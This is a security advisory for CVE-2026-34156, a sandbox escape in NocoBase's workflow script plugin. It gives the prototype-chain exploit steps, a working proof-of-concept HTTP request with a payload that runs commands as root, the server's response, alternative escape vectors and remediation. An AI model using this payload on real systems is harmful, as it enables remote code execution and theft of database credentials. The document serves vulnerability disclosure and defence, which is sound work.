PT-2026-29158 · npm · @nocobase/plugin-workflow-javascript
Published 2026-03-30 · Updated 2026-03-30 · CVE-2026-34156
CVSS v3.1: 9.9 Critical (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
## Summary
NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js `vm` sandbox with a custom `require` allowlist (controlled by the `WORKFLOW_SCRIPT_MODULES` environment variable). However, the `console` object passed into the sandbox context is the host's own console, which exposes host-realm `WritableWorkerStdio` stream objects via `console._stdout` and `console._stderr`. Because those streams (and their methods) were created in the host realm, their prototype chain leads to the host realm's `Function` constructor rather than the sandbox's.
An authenticated attacker can follow that prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

  1. console._stdout.constructor.constructor → host-realm Function constructor
  2. Function('return process')() → Node.js process object
  3. process.mainModule.require('child_process') → unrestricted module loading
  4. child_process.execSync('id') → RCE as root

This completely bypasses the customRequire allowlist.

Impact

  • Remote Code Execution as root (uid=0) inside the Docker container
  • Database credential theft (DB_PASSWORD, INIT_ROOT_PASSWORD from process.env)
  • Arbitrary file read/write via require('fs')
  • Reverse shell confirmed
  • Outbound network access for lateral movement

Proof of Concept

HTTP request:

```http
POST /api/flow_nodes:test
Authorization: Bearer
Content-Type: application/json
```

```json
{
  "type": "script",
  "config": {
    "content": "const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('id').toString().trim();",
    "timeout": 5000,
    "arguments": []
  }
}
```

Response:

```json
{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}
```

Environment

  • Docker image: nocobase/nocobase:latest
  • NocoBase CLI: v2.0.26
  • Node.js: v20.20.1
  • OS: Debian GNU/Linux 12 (bookworm)

PoC

  • Got reverse shell [screenshot, 2026-03-26 06:09:51]
  • Proof of concept of the root privileges [screenshot, 2026-03-26 06:12:29]
  • os-release demonstration [screenshot, 2026-03-26 06:12:54]
  • App path [screenshot, 2026-03-26 06:14:04]

Exploit Usage:

  • Reverse Shell Mode [screenshot: tool1]
  • Dump system information & creds [screenshot: tool2]
  • Remote Command Execution Mode [screenshot: tool3]

Remediation

  1. Replace the Node.js vm module with isolated-vm for true V8 isolate separation
  2. Do not pass the host console object into the sandbox; create a clean proxy
  3. Run the application as a non-root user inside Docker
  4. Restrict /api/flow_nodes:test to admin-only roles

Alternative Escape Vectors

  • console._stderr.constructor.constructor (identical chain via stderr)
  • Error.prepareStackTrace + CallSite.getThis() (V8 CallSite API)

Reporter

Onurcan Genç — Independent Security Researcher, Bilkent University

Related Identifiers

CVE-2026-34156
GHSA-PX3P-VGH9-M57C

Affected Products

@nocobase/plugin-workflow-javascript